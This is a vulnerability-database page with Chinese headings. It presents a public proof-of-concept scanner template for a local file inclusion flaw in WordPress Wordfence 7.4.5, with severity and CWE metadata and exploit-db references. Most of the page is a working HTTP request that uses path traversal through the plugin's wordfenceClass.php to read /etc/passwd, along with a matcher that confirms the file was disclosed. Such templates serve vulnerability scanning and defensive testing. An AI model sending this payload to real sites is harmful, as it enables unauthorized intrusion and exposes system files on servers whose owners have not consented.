wordpress-wordfence-lfi: WordPress Wordfence 7.4.5 - Local File Inclusion

日期: 2025-08-01 | 影响软件: WordPress Wordfence | POC: 已公开

漏洞描述

WordPress Wordfence 7.4.5 is vulnerable to local file inclusion.

PoC代码[已公开]

id: wordpress-wordfence-lfi

info:
  name: WordPress Wordfence 7.4.5 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: WordPress Wordfence 7.4.5 is vulnerable to local file inclusion.
  reference:
    - https://www.exploit-db.com/exploits/48061
    - https://www.nmmapper.com/st/exploitdetails/48061/42367/wordpress-plugin-wordfence745-local-file-disclosure/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: wordpress,wp-plugin,lfi,wordfence,edb,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=/../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a004830460221008891abdb3fd3329df4d393c725193ce6ee119fb3342d34fa53b565a33c921e53022100cc103088d64dbcf9f8b2228ca79e56c48dea4e62bc3c9bdc3cf80cba943db02b:922c64590222798bb761d5b6d8e72950

相关漏洞推荐